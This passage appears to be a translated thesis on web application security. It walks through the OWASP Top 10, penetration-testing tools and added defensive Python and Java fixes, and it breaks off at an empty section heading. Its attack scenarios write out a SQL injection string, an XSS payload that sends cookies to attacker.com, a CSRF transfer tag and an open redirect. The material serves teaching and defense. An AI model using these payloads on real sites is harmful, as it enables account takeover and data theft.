Abstract

The report contains 85 pages, 11 figures, 2 tables.

10 sources were used.

WEB APPLICATION, INFORMATION PROTECTION, SECURITY, VULNERABILITIES, PENETRATION TESTING, INJECTIONS, SQL, XSS

This work examines the main vulnerabilities of web applications, the methods and tools for detecting them, and the existing solutions for protection. It describes the implementation of the developed software tools for securing web applications when working with databases. The test application was scanned both without the developed software tools and with them applied. General recommendations for securing web applications are formulated.
Definitions

Web application - a type of application based on client-server interaction, in which the server is a web server and the client is an application capable of sending requests to the web server.

Web server - a server that accepts requests and returns responses over the HTTP protocol and the protocols that extend it. Both software and hardware are referred to as a web server.

Proxy server - a server in computer networks that allows clients to make indirect requests to other network services.

Library - a set of ready-made classes and functions intended for use in external software products.

Framework - a software platform that defines the structure of a software system; software that simplifies the development and integration of the different components of a large software project.

Vulnerability - a flaw in a system whose exploitation can lead to a violation of the system's integrity or cause it to malfunction.

Exploitation of a vulnerability - the use of a system flaw, most often by means of a malicious script or program (an exploit).

Attack vector - the direction of the attacker's influence on the system.

Authentication - verification of the identifier presented by a user.

Authorization - granting a particular person or group of persons the right to perform particular actions, and also the process of checking (confirming) those rights when an attempt is made to perform the actions.
Notation and abbreviations

OWASP - Open Web Application Security Project

API - Application Programming Interface

SQL - Structured Query Language

HTTP - HyperText Transfer Protocol

URL - Uniform Resource Locator

XSS - Cross Site Scripting

CSRF - Cross Site Request Forgery

ID - identifier
ОС - operating system (OS)
ПО - software
БД - database (DB)

СУБД - database management system (DBMS)
Introduction

It is hard to imagine the life of modern society without personal computers, smartphones, tablets and other devices. The wide spread of devices able to connect to the global Internet (among which, besides televisions, music players, game consoles and smart watches, there are also refrigerators, washing machines and irons) has made using its possibilities an everyday matter for anyone. Buying and selling goods, calling a taxi, ordering food, reading news outlets and various themed magazines, watching television programmes, series, films and broadcasts of various events, listening to music, money transfers, paying bills and fines, booking a doctor's appointment, editing images, audio and video content - all of this can be done online.

The main form of access to all these possibilities is the web application. A web application is a client-server application in which the client is the user's web browser and the server is a web server. The main advantage of web applications is cross-platform support.

The client implements the user interface, generates requests to the server and processes the responses received from it. The server processes the requests coming from the client, then builds a web page and sends it to the client over the HTTP protocol.

User data is stored on the server side in databases, which the servers access with SQL queries. These databases may hold important personal information, such as passport details, addresses, phone numbers, bank account and credit card numbers, so the confidential data of users must be protected.

Relevance of the topic

Developers' neglect of methods and tools for protecting web applications can lead to extremely negative consequences. Data can be compromised, as a result of which users may lose their accounts in several web applications at once, because we often use the same e-mail address and the same password for several services. For developers, the theft of data by attackers threatens loss of reputation, of important and prospective clients, and huge financial losses and expenses for restoring the data.

Attackers and their motives can be very diverse: employees with a grudge against management or pursuing easy enrichment; competing companies wishing to compromise an opponent's activity or reveal its current projects developed in secret; cyber-criminals stealing content and leaking it online, or demanding a ransom for not disclosing the stolen information; hacker groups taking down the servers of large companies to attract attention; intelligence services; and ordinary users carrying out attacks for fun.

Positive Research, one of the largest information security research centres in Europe and part of the international company Positive Technologies, in its report for 2016 provided data on the share of vulnerable sites by the maximum risk level of their vulnerabilities. Flaws of at least medium severity were found in all the applications studied, and critical vulnerabilities were found in 70% of them. It is not enough simply to develop a web application; the security of data and transactions must be ensured.

Goals and objectives

The goal of this work is to develop software tools for securing web applications. To achieve this goal the following objectives were formulated:

1) analyze the main vulnerabilities of web applications and the attack vectors against them;

2) study the methods and tools for detecting vulnerabilities;

3) study the methods and tools for eliminating vulnerabilities and protecting against attacks of various kinds;

4) formulate general recommendations for minimizing the occurrence of vulnerabilities when developing web applications.
1. Web application vulnerabilities, methods of detecting and fixing them

1.1. Main web application vulnerabilities

When developing web applications, data security must always be taken into account. It is not enough simply to use complex passwords and various secured connections. There are various attack vectors that exploit particular software vulnerabilities, and developers must be aware of the most dangerous and widespread vulnerabilities, as well as the methods for preventing these vulnerabilities from appearing in a software product.

The international non-profit organization OWASP (Open Web Application Security Project), which analyzes and develops methods for improving web application security, published a list of the 10 most critical vulnerabilities, the OWASP Top 10 (2013), whose main goal is to raise awareness among software developers. Let us look at the vulnerabilities from this list in more detail.
1.1.1. Injection (code injection)

Injection (SQL, OS, LDAP) becomes possible when untrusted data is sent to an interpreter as part of a command or query. Data inserted by an attacker can trigger the execution of unintended commands or access to data without proper authorization.

• Attack vectors - the attacker sends expressions that use the syntax of the target interpreter.

• Security weaknesses - legacy code; SQL, LDAP, XPath and NoSQL queries; OS commands; XML parsers; SMTP headers; program arguments.

• Technical impact - corruption or loss of data, denial of access to accounts and data.

Identifying the vulnerability

The best way to determine whether an application is vulnerable to injection is to verify that untrusted data is clearly separated from commands and queries by the interpreters. For SQL queries this means using prepared statements and stored procedures and avoiding dynamic queries. This check can be performed manually, as a code review. Specialized tools, vulnerability scanners, can also be used.

Preventing the vulnerability

Eliminating the possibility of code injection requires separating untrusted data from commands and queries.

1) The preferred option is to use a safe API that avoids the use of an interpreter entirely or provides a parameterized interface.

2) If a parameterized API is not available, special characters should be escaped. The various techniques are described in the ESAPI (Enterprise Security API) document from OWASP.

3) It is also recommended to validate input against a whitelist, but this is not a complete defence, since many applications require special characters in their input.

Attack scenario examples

The application uses untrusted data when building the following vulnerable SQL query:

String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";

The attacker changes the value of the 'id' parameter in the browser to send: ' or '1'='1. For example:

http://example.com/app/accountView?id=' or '1'='1

This changes the meaning of the query, and as a result all records from the accounts table are returned.
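
The following Python example is added here and is not code from the thesis or its tools. It reproduces the string-built query above against a constructed in-memory SQLite table and puts the parameterized interface (recommendation 1) and a whitelist check (recommendation 3) beside it, so the difference on the page's 'id' value is visible.

```python
import sqlite3

def make_db():
    # Constructed sample table for the demonstration (not from the original page).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (custID TEXT, owner TEXT, balance INTEGER)")
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)",
        [("1001", "alice", 50), ("1002", "bob", 75), ("1003", "carol", 20)],
    )
    return conn

def lookup_vulnerable(conn, cust_id):
    # Mirrors the page's vulnerable Java query: untrusted input is glued into
    # the SQL text, so the value is parsed as part of the command.
    query = "SELECT * FROM accounts WHERE custID='" + cust_id + "'"
    return conn.execute(query).fetchall()

def lookup_parameterized(conn, cust_id):
    # Parameterized interface: the driver passes the value separately from the
    # query text, so it can never change the query's structure.
    query = "SELECT * FROM accounts WHERE custID=?"
    return conn.execute(query, (cust_id,)).fetchall()

def lookup_allowlisted(conn, cust_id):
    # Whitelist validation of the input format before it reaches the database,
    # on top of parameterization. Returns None when the value is rejected.
    if not cust_id.isdigit():
        return None
    return lookup_parameterized(conn, cust_id)

PAYLOAD = "' or '1'='1"   # the id value from the page's attack scenario

if __name__ == "__main__":
    db = make_db()
    print(len(lookup_vulnerable(db, PAYLOAD)))      # 3: every row leaks
    print(len(lookup_parameterized(db, PAYLOAD)))   # 0: treated as a literal string
    print(lookup_allowlisted(db, PAYLOAD))          # None: rejected before the query
```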

1.1.2. Broken Authentication and Session Management (incorrect authentication and session management)

Application functions related to authentication and session management are often not implemented correctly, which allows attackers to compromise passwords, keys or session tokens, or to exploit other implementation flaws in order to assume other users' IDs.

• Attack vectors - the attacker uses flaws in the authentication or session management functions (for example, exposed accounts, passwords, session IDs) to impersonate another user.

• Security weaknesses - the mechanisms for session management, logout, password management, timeouts, "remember me", account update.

• Technical impact - the ability to attack accounts, including privileged ones. After a successful attack the attacker can do anything in the web application that the victim could.

Identifying the vulnerability
A web application may be vulnerable if:

1) user credentials are not protected in storage by hashing or encryption;

2) credentials can be guessed or overwritten through weak account management functions (account creation, password change);

3) session IDs are exposed in the URL;

4) session IDs are not limited in time, and user sessions or authentication tokens are not properly invalidated on logout;

5) session IDs are not changed after a successful login.

Preventing the vulnerability

The main recommendation for organizations is to provide developers with a single set of session management controls, which should:

1) meet all the authentication and session management requirements defined in the OWASP Application Security Verification Standard (ASVS);

2) have a simple interface for developers, for example the ESAPI Authenticator and User APIs.

Attack scenario examples

Scenario 1: an airline ticket booking application supports URL rewriting, and the session ID is added to the URL:
http://example.com/sale/saleitems?sessionid=268544541&dest=SPB

An authorized user sends the link to friends to tell them about the purchase. Whoever follows this link uses that user's session and can therefore obtain all of his personal data, including his credit card information.

Scenario 2: the application's timeouts are set incorrectly. A user accesses the site from a public computer. Instead of logging out, the user simply closes the browser tab and leaves. An hour later an attacker uses the same browser, with the user still logged in.
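
An added Python example (not code from the thesis) of a minimal server-side session store that addresses items 3 to 5 above and both scenarios: the ID travels only in a cookie, is rotated at login, expires on the server after an idle timeout, and is destroyed on logout. The timeout value and the injectable clock are assumptions for the demonstration.

```python
import secrets
import time

IDLE_TIMEOUT = 15 * 60  # seconds; assumed value, tune per application

class SessionStore:
    """Server-side session store; sessions are keyed by an unpredictable id."""

    def __init__(self, clock=time.time):
        self._clock = clock          # injectable so expiry can be exercised
        self._sessions = {}          # session id -> {"user": ..., "last_seen": ...}

    def create(self):
        sid = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG
        self._sessions[sid] = {"user": None, "last_seen": self._clock()}
        return sid

    def login(self, sid, user):
        # Issue a fresh id at authentication so an id known before login
        # (e.g. one that leaked through a shared URL) is not usable afterwards.
        if self._sessions.pop(sid, None) is None:
            return None
        new_sid = self.create()
        self._sessions[new_sid]["user"] = user
        return new_sid

    def user_for(self, sid):
        # Returns the logged-in user, or None if the session is unknown or idle too long.
        sess = self._sessions.get(sid)
        if sess is None:
            return None
        now = self._clock()
        if now - sess["last_seen"] > IDLE_TIMEOUT:
            del self._sessions[sid]      # expire on the server, not only in the browser
            return None
        sess["last_seen"] = now
        return sess["user"]

    def logout(self, sid):
        # Invalidate server-side; clearing the cookie alone would leave the id valid.
        return self._sessions.pop(sid, None) is not None

def session_cookie(sid):
    # Carry the id in a cookie, never in the URL, so it is not shared in links.
    return "session=%s; HttpOnly; Secure; SameSite=Lax; Path=/" % sid
```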

1.1.3. Cross-Site Scripting (XSS, cross-site script execution)

An XSS attack becomes possible when an application takes untrusted data and sends it to the browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim's browser that can hijack user sessions, deface web pages or redirect the user to malicious sites.

• Attack vectors - the attacker sends scripts that are executed by the interpreter in the browser.

• Security weaknesses - input fields whose data is sent to the browser without proper validation or filtering.

• Technical impact - the ability to hijack a user's session, deface a web page, insert malicious content or redirect users.

Identifying the vulnerability

A web application may be vulnerable if user input is not properly escaped or is not validated on the server before that input is included in the output page.

Automated tools can find some XSS vulnerabilities automatically. However, every application builds its pages differently and uses different browser-side interpreters, such as JavaScript, ActiveX, Flash and Silverlight, which makes automated detection difficult. The best option is a combination of code analysis, penetration testing and the automated approach.

Preventing the vulnerability

Preventing XSS attacks requires separating untrusted data from the content of the browser.

1) The preferred option is to properly escape untrusted data according to the HTML context (body, attribute, JavaScript, CSS or URL) into which the data will be placed. Data escaping techniques are covered in the OWASP XSS Prevention Cheat Sheet.

2) It is recommended to use a whitelist for input validation on the server, but this is not a panacea, since many applications require special characters. Such validation should check the length, characters, format and business rules for the data.

3) Use auto-sanitization libraries (AntiSamy from OWASP or the Java HTML Sanitizer Project).

Attack scenario examples

The application uses untrusted data when building an HTML fragment without input validation:

(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";

The attacker changes the "CC" parameter in the browser to:
'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'

This causes the victim's session ID to be sent to the attacker's site, allowing the current session to be hijacked.
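
An added Python example (not code from the thesis) of the same fragment built with and without attribute-context escaping (recommendation 1), plus a whitelist check for the card field (recommendation 2), run on the "CC" value from the scenario above. The `contains_script_element` check is a deliberately crude illustration, not a detection method.

```python
import html

# The "CC" value from the page's attack scenario, used here only as test input.
PAYLOAD = ("'><script>document.location='http://www.attacker.com/cgi-bin/"
           "cookie.cgi?foo='+document.cookie</script>'")

def fragment_vulnerable(cc):
    # Same construction as the page's Java fragment: the parameter is
    # concatenated straight into a single-quoted attribute value.
    return "<input name='creditcard' type='TEXT' value='" + cc + "'>"

def fragment_escaped(cc):
    # Escape for the HTML attribute context before insertion. quote=True also
    # encodes ' and " so the value cannot terminate the attribute early.
    safe = html.escape(cc, quote=True)
    return "<input name='creditcard' type='TEXT' value='" + safe + "'>"

def validate_cc(cc):
    # Whitelist validation (length, characters, format): a card number field
    # has no business reason to contain anything but 13 to 19 digits.
    return cc.isdigit() and 13 <= len(cc) <= 19

def contains_script_element(fragment):
    # Crude marker used only to show the effect of escaping in this example.
    return "<script" in fragment.lower()

if __name__ == "__main__":
    print(fragment_vulnerable(PAYLOAD))   # attribute closed, script element emitted
    print(fragment_escaped(PAYLOAD))      # payload stays inside the attribute value
```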

1.1.4. Insecure Direct Object References (insecure direct references to objects)

Direct object references occur when a developer exposes a reference to an internal implementation object, such as a file, directory or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.

• Attack vectors - an authorized attacker changes the value of a parameter that refers to a system object for which the user has no rights.

• Security weaknesses - the use of real object names or keys when generating web pages, and the absence of a check that the user has the right to access the target object.

• Technical impact - compromise of all data referenced by the parameter.

Identifying the vulnerability

The best way to determine whether an application is vulnerable to insecure direct object references is to verify that these references are protected.

1) For direct references to restricted resources - a check of the user's access rights to the resource.

2) If the reference is not direct - a mapping from the reference to the object allowed for the user.

Effective methods for detecting this vulnerability are code review and manual testing. Automated tools usually do not find such flaws, because they cannot recognize what requires protection or what is safe or unsafe.

Preventing the vulnerability

To prevent insecure direct object references, follow these recommendations:

1) Use indirect object references for each user or session.

2) Use of a direct reference from an untrusted source must include an access check.

Attack scenario examples

The application uses unverified data in an SQL query that accesses personal data:

String query = "SELECT * FROM accts WHERE account = ?";
PreparedStatement pstmt = connection.prepareStatement(query, ...);
pstmt.setString(1, request.getParameter("acct"));
ResultSet results = pstmt.executeQuery();

The attacker changes the "acct" parameter to send any account. Without the necessary check, he can gain access to any user's account.
http://example.com/app/accountInfo?acct=notmyacct

1.1.5. Security Misconfiguration (insecure configuration)

A high level of protection requires a secure configuration for the application, web server, DBMS and all other components. Secure settings must be defined, implemented and maintained, because default settings are often insecure.

• Attack vectors - the attacker gains access to default accounts, unused pages, unprotected files and directories.

• Security weaknesses - an insecure configuration can exist at any level of the application stack (platform, web server, database, frameworks).

• Technical impact - the possibility of full system compromise, modification or theft of data.

Identifying the vulnerability
A web application may be vulnerable if:

1) outdated software is used (web server, DBMS);

2) unnecessary functions and elements are enabled or installed (ports, services, accounts);

3) default accounts are enabled and unchanged;

4) the error handling system reveals excessive error information to users;

5) security settings in frameworks and libraries are not configured properly.

Preventing the vulnerability

The main recommendations are as follows:

1) Develop an automated hardening process that allows the application to be deployed quickly and easily in another environment.

2) Regularly update software and install patches for every environment in use.

3) Use a secure architecture that provides reliable separation of components.

4) Perform regular scans and security audits.

Attack scenario examples

Scenario 1: default accounts are not changed. The attacker discovers that the standard administrator pages are present on your server, logs in with the default passwords and gains full control of the server.

Scenario 2: the application server ships with sample applications that are not removed from your server. These sample applications have known vulnerabilities that can be used to carry out attacks.

1.1.6. Sensitive Data Exposure (leakage of critical data)

Many web applications do not protect confidential data such as credit cards, tax identifiers and credentials. Attackers can steal or modify such weakly protected data. This data requires additional protection, such as encryption at rest or in transit, as well as special precautions when it is exchanged with the browser.

• Attack vectors - attackers usually do not steal encrypted data directly. They steal something else: data from the server in transit or directly from the user's browser, and they also carry out man-in-the-middle attacks.

• Security weaknesses - no encryption of confidential data, or weak methods of encrypting/hashing passwords.

• Technical impact - the possibility of compromising all confidential data.

Identifying the vulnerability
A web application may be vulnerable if:

1) data is stored in clear text for a long time, including in backups;

2) data is transmitted in clear text;

3) weak encryption methods are used;

4) weak encryption keys are generated, or proper key management is absent.

Preventing the vulnerability

To protect confidential data, at least the following minimum recommendations must be followed:

1) use encryption at rest and in transit;

2) do not store critical data unless necessary;

3) use strong encryption algorithms;

4) store passwords using algorithms designed for protecting them (bcrypt, PBKDF2, scrypt);

5) disable form autocomplete and caching for pages containing confidential data.

Attack scenario examples

The application encrypts credit card numbers in the database using automatic encryption. This means the data is automatically decrypted when retrieved, which allows an injection to be used to extract the credit card numbers as plain text.

1.1.7. Missing Function Level Access Control (missing access control at the function level)

Most web applications check access at the function level. Nevertheless, applications must perform the same access control checks on the server when functions are invoked. If requests are not verified, attackers will be able to forge requests in order to access functions without authorization.

• Attack vectors - an authorized attacker changes the URL or a parameter to a restricted function.

• Security weaknesses - weak protection of application functions that may be managed through configuration, while the system may be misconfigured.

• Technical impact - the possibility of gaining access to restricted functionality, including administrative functions.

Identifying the vulnerability
A web application may be vulnerable if:

1) the user interface shows navigation to restricted functionality;

2) there is no authorization check on the server;

3) the server performs checks that rely entirely on information supplied by the attacker.

Preventing the vulnerability

To eliminate these vulnerabilities, a web application must have the following elements:

1) an authorization analysis module that is called from all business logic functions;

2) an easily updated and testable privilege management module;

3) a mechanism that requires permissions to be granted when access to functions is attempted.

Attack scenario examples

The attacker browses target URLs that require authentication. Administrator rights are required to access the admin_getappInfo page.
http://example.com/app/getappInfo
http://example.com/app/admin_getappInfo

If an unauthorized user can access either page, that is a vulnerability. If an authenticated user who is not an administrator has access to the admin_getappInfo page, that is also a vulnerability.
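
An added Python example (not code from the thesis) that serves both section 1.1.4 and this section: per-session indirect object references with an ownership check for the account lookup, and a server-side role check for getappInfo and admin_getappInfo that ignores anything the request claims about the caller. The account and role tables are constructed sample data.

```python
import secrets

# Constructed sample data (assumptions for the example).
ACCOUNTS = {"acct-100": {"owner": "alice", "balance": 50},
            "acct-200": {"owner": "bob", "balance": 75}}
ROLES = {"alice": {"user"}, "bob": {"user"}, "root": {"user", "admin"}}

class Forbidden(Exception):
    pass

class ReferenceMap:
    """Per-session indirect references (section 1.1.4, recommendation 1):
    the client only ever sees random handles, never the real database keys."""

    def __init__(self):
        self._to_direct = {}

    def indirect(self, direct_key):
        # Reuse an existing handle for this key, otherwise mint a new one.
        for handle, key in self._to_direct.items():
            if key == direct_key:
                return handle
        handle = secrets.token_urlsafe(8)
        self._to_direct[handle] = direct_key
        return handle

    def direct(self, handle):
        return self._to_direct.get(handle)

def account_info(session_user, refmap, handle):
    # Resolve through this session's map, then still verify ownership
    # (recommendation 2: the access check is never skipped).
    key = refmap.direct(handle)
    if key is None or ACCOUNTS[key]["owner"] != session_user:
        raise Forbidden("no access to that account")
    return ACCOUNTS[key]

def require_role(role):
    # Function-level check performed on the server against the server's own
    # role table; it never consults data carried by the request (items 2, 3).
    def decorator(fn):
        def wrapper(session_user, *args, **kwargs):
            if role not in ROLES.get(session_user, set()):
                raise Forbidden("%s requires role %s" % (fn.__name__, role))
            return fn(session_user, *args, **kwargs)
        return wrapper
    return decorator

@require_role("user")
def getappInfo(session_user):
    return {"app": "example", "user": session_user}

@require_role("admin")
def admin_getappInfo(session_user, claimed_role="user"):
    # claimed_role stands for a request parameter; it is deliberately ignored.
    return {"app": "example", "admin": session_user, "ignored": claimed_role}

def denied(fn, *args, **kwargs):
    # Helper: True when the call is refused by an access check.
    try:
        fn(*args, **kwargs)
        return False
    except Forbidden:
        return True
```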

1.1.8. Cross-Site Request Forgery (CSRF, cross-site request forgery)

A CSRF attack forces a logged-in browser to send a forged HTTP request, including the session ID and other authentication information, to the server. This makes it possible to force the victim's browser to generate requests that the vulnerable application treats as legitimate.

• Attack vectors - the attacker creates forged HTTP requests and tricks the victim into submitting them via image tags, XSS or other methods.

• Security weaknesses - applications that allow all the details of a particular action to be predicted.

• Technical impact - the attacker can make the victim perform any state-changing operation: logging in, updating account data, carrying out financial transactions.

Identifying the vulnerability

A web application may have a CSRF vulnerability if it does not use unpredictable CSRF tokens, without which attackers can easily create malicious requests. Particular attention should be paid to protecting the functions that change account state.

Preventing the vulnerability

Preventing CSRF vulnerabilities usually requires including a unique, unpredictable per-session token in every HTTP request.

1) The preferred option is to include the token in a hidden field (sent in the request body).

2) Use OWASP CSRF Guard, which automatically includes tokens in Java EE and .NET applications, and the CSRF prevention methods from OWASP ESAPI.

3) Require the user to re-authenticate.

Attack scenario examples

The application lets the user submit a state-changing request that contains nothing secret:
http://example.com/transfer?amount=1500&destAccount=46732243

The attacker builds a request that transfers money from the victim's account to his own, and then embeds this attack in a request for an image hosted on his site:

<img src="http://example.com/transfer?amount=1500&destAccount=attackersAcct#" width="0" height="0" />

If the victim visits the attacker's site after authenticating on example.com, the forged requests include the session information, authorizing the attacker's request.
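
An added Python example (not code from the thesis) of option 1 above: a per-session unpredictable token rendered into a hidden field and checked on every state-changing request. The `transfer` handler, session IDs and balances are constructed for the demonstration; it rejects both a GET (which is all an image tag can send) and a POST without the token.

```python
import hmac
import secrets

class CsrfProtection:
    """Per-session token, carried in a hidden form field and verified on
    every state-changing request."""

    def __init__(self):
        self._tokens = {}   # session id -> token

    def token_for(self, session_id):
        # One unpredictable token per session, created on first use.
        if session_id not in self._tokens:
            self._tokens[session_id] = secrets.token_hex(32)
        return self._tokens[session_id]

    def hidden_field(self, session_id):
        # Emitted into the server-rendered form (sent back in the request body).
        return '<input type="hidden" name="csrf_token" value="%s">' % self.token_for(session_id)

    def is_valid(self, session_id, form):
        submitted = form.get("csrf_token")
        expected = self._tokens.get(session_id)
        if submitted is None or expected is None:
            return False
        return hmac.compare_digest(submitted, expected)

def transfer(csrf, session_id, method, form, balances):
    # State changes are accepted only via POST with a valid token. A request
    # triggered by the page's <img src=...> is a GET and carries no hidden field.
    if method != "POST" or not csrf.is_valid(session_id, form):
        return "rejected"
    amount = int(form["amount"])
    if amount <= 0 or balances["victim"] < amount:
        return "rejected"
    dest = form["destAccount"]
    balances["victim"] -= amount
    balances[dest] = balances.get(dest, 0) + amount
    return "ok"
```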

1.1.9. Using Components with Known Vulnerabilities (use of components with known vulnerabilities)

Components such as libraries, frameworks and software modules often run with access to data. If a vulnerable component is used, attacks on it can undermine the protection of the whole application.

• Attack vectors - the attacker identifies a vulnerable component, customizes an exploit and carries out the attack.

• Security weaknesses - outdated components, as well as components that include other vulnerable components.

• Technical impact - depends on the type of vulnerabilities in the vulnerable components.

Identifying the vulnerability

In theory it is easy to determine whether an application uses vulnerable components. Unfortunately, not all libraries have vulnerability reports, and the component versions that contain vulnerabilities are not always precisely identified.

Preventing the vulnerability

One way to eliminate this vulnerability is not to use components you did not write yourself, but this is not very realistic. Many developers do not fix vulnerabilities in old versions, so all components in use should be updated to the latest versions. Good practice is to follow these guidelines:

1) Identify all components in use.

2) Monitor fresh reports on their security.

3) Establish security policies governing the use of components.

Attack scenario examples

Component vulnerabilities can cause practically any conceivable risk. Components run with full access to the application's data and functionality, so exploitation of their vulnerabilities can have serious consequences.

1.1.10. Unvalidated Redirects and Forwards 

Web applications frequently redirect users to other pages and web sites, using untrusted data to determine the target page. Without proper validation, attackers can redirect victims to phishing or malware sites. 

• Attack vectors - the attacker replaces a safe link with one to an unvalidated page. The victim follows the link and, for example, leaves their personal data there. 

• Security weaknesses - unvalidated parameters that redirect to other resources. 

• Technical impact - the possibility of credential theft, as well as bypassing access control. 
Identifying the vulnerability 

To determine whether the application is vulnerable, review the code of every redirect and forward and check whether the target URL is taken from any parameter value. If it is, and the target URL is not on a whitelist, the application is probably vulnerable. 

Preventing the vulnerability 

Redirects can be used safely in several ways: 

1) Simply do not use redirects and forwards. 

2) If you do use them, do not involve user-supplied parameters when computing the destination. 

3) If the parameters cannot be eliminated, make sure that the supplied value is valid and permitted for the user. It is recommended that such parameters be opaque values rather than actual addresses. 

Example attack scenarios 

The application has a page "redirect.jsp" that takes a parameter "url". The attacker passes in the parameter an address that sends users to a malicious site: 
http://www.example.com/redirect.jsp?url=evil.com 
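The third recommendation above (opaque values instead of addresses) can be implemented in a Java servlet as follows. This is an added example, not code from the thesis or its test application; the class name SafeRedirectServlet, the parameter name dest and the destination table are assumptions. The vulnerable counterpart of this servlet would be a single line, resp.sendRedirect(req.getParameter("url")), which is exactly what the redirect.jsp scenario describes.

```java
import java.io.IOException;
import java.util.HashMap;
import java.util.Map;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

/**
 * Replacement for a "redirect.jsp?url=..." page (hypothetical class).
 * The client supplies a short key ("dest"), never a URL. The key is looked
 * up in a fixed allow-list and anything unknown is refused outright.
 */
public class SafeRedirectServlet extends HttpServlet {

    // Constructed allow-list: key -> destination (assumed values)
    private static final Map<String, String> DESTINATIONS = new HashMap<String, String>();
    static {
        DESTINATIONS.put("home", "/index.jsp");
        DESTINATIONS.put("profile", "/profile.jsp");
        DESTINATIONS.put("help", "https://help.example.com/");
    }

    /** Returns the permitted target for a key, or null when the key is unknown. */
    static String resolve(String key) {
        if (key == null) {
            return null;
        }
        return DESTINATIONS.get(key);
    }

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp)
            throws ServletException, IOException {
        String target = resolve(req.getParameter("dest"));
        if (target == null) {
            // Missing or unknown key: refuse rather than redirect anywhere the client asks
            resp.sendError(HttpServletResponse.SC_BAD_REQUEST, "Unknown redirect destination");
            return;
        }
        resp.sendRedirect(target);
    }
}
```

Because the destination is chosen by the server from a table, a request such as /redirect?dest=evil.com cannot produce a redirect at all, while the known keys still work (/redirect?dest=profile leads to /profile.jsp).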
1.2. Tools for finding vulnerabilities 

Vulnerabilities are usually discovered with web application penetration-testing tools that work on the "black box" principle. The main categories of such tools are: 

1) network scanners; 

2) vulnerability scanners; 

3) vulnerability exploitation tools; 

4) injection tools; 

5) debuggers. 

All of these tools are used both by information security specialists and by attackers themselves. 

1.2.1. Network scanners 

Network scanners are designed to determine the available network services and ports, the components present and their versions. 

A popular representative of network scanners is the free utility Nmap. Nmap is an extensible set of tools for network scanning and security auditing. It can be used to determine the services running on a host, the versions of the OS and applications, and the presence of a firewall. 
1.2.2. Vulnerability scanners 

Vulnerability scanners are intended to find common vulnerabilities such as SQL injection and XSS, as well as various mistakes made by the developer, such as temporary or test files that were never removed. 

An example of such a tool is the OWASP Zed Attack Proxy (ZAP) project. ZAP is a free, open-source tool for penetration testing of web applications. ZAP is an intercepting proxy: it sits on the network between the tester's browser and the web application, so that client requests and server responses can be intercepted and inspected, modified when necessary, and then delivered to their destination. ZAP can thus be used to perform "man in the middle" attacks. If another proxy server is present on the network, for example in a corporate environment, ZAP can be configured to connect through that proxy. ZAP has a simple interface and can be used by any beginner with minimal application-testing experience, while its many options for active scanning also make it useful to security specialists. 

Before use, the browser must be configured to use ZAP as its proxy. After configuration, make sure that the web application under test opens in the browser; scanning can then begin. 

ZAP has a safe mode to prevent changes to the web application's data, because a scan is a simulation of a real attack and, just as in a real attack, the functionality of the web application or its database may be damaged. 

The simplest way to use ZAP is the quick start. You select the URL of the web application to attack and press the "Attack" button. The program launches a spider to build a tree of the site's pages, after which passive scanning starts. During the scan the requests and responses for each page are examined, and if something is wrong with them, alerts are generated. Alerts are grouped by risk level: high, medium, low. 

Passive scanning does not modify requests or responses and is considered safe for the data and for the application itself. It is suitable for finding some basic vulnerabilities. Active scanning is in essence a real attack, for example SQL injection or XSS, which puts the data at risk. Active scanning should be carried out only against web applications you have permission to test. 

1.2.3. Vulnerability exploitation 

Vulnerabilities are exploited with special tools that contain ready-made exploits, to which one only needs to pass the parameters required for using the vulnerability. 

One such tool is the Metasploit Framework. It is a free project for writing, debugging and automatically launching exploits. For each exploit one can choose the action to be performed if the attack succeeds. 

Example attack scenario: 

1) selecting and configuring an exploit; 

2) checking the exploit's suitability for the target system; 

3) selecting and configuring its parameters; 

4) selecting an encryption algorithm to evade the intrusion detection system; 

5) running the exploit. 


1.2.4. Injections 

Specialized tools exist for finding injection vulnerabilities. Such tools can often exploit these vulnerabilities or give recommendations on how to exploit them. 

One of the most powerful free open-source tools for automatically detecting and exploiting such vulnerabilities is sqlmap. The utility supports the following DBMSs: MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and HSQLDB. sqlmap can: 

• identify the target DBMS; 

• list the databases, tables and columns; 

• dump a database fully or partially; 

• extract user names and password hashes; 

• recognize the type of hash in use. 

The following SQL injection techniques are supported: 

1) UNION query-based. The classic injection example: an argument beginning with "UNION ALL SELECT" is passed in the vulnerable parameter. The method works when the web application prints the selected records one after another directly on the page. 

2) Error-based. The scanner passes a syntactically invalid expression in the vulnerable parameter and then analyzes the HTTP response for DBMS errors that contain the passed expression. The technique works when the application exposes DBMS errors. 

3) Stacked queries. Here the scanner checks whether sequential queries are supported. If they execute, a semicolon (;) followed by the injected SQL query is appended to the vulnerable parameter. This technique is used for manipulating data. 

4) Boolean-based blind. An implementation of blind injection, that is, for the case where data from the DB is not otherwise returned by the web application in clear form. The method is also called deductive. A syntactically valid expression with a SELECT subquery, or any other selection command, is appended to the vulnerable parameter. The response received is compared with the response to the original request, which lets the utility determine the output of the injected expression character by character. Requests can also be sent to identify "true" pages, hence the name of the technique. 

5) Time-based blind. An implementation of fully blind injection. It differs from the boolean-based blind technique in that the added subquery forces the DBMS to pause for a set time, for example with the SLEEP() command. The scanner can extract data from the database by comparing the response times of its requests. 

1.2.5. Debuggers 

Debuggers are most often used by developers themselves to find errors in code. But these tools can also be useful in penetration tests, where one can vary the input parameters and analyze the application's responses to them. 

An example of such a tool is the web debugger Fiddler. It is a debugging proxy that logs all HTTP traffic, analyzes it, and allows breakpoints to be set and incoming/outgoing data to be modified. 
1.3. Existing solutions 

1.3.1. Solutions adopted at the development stage 

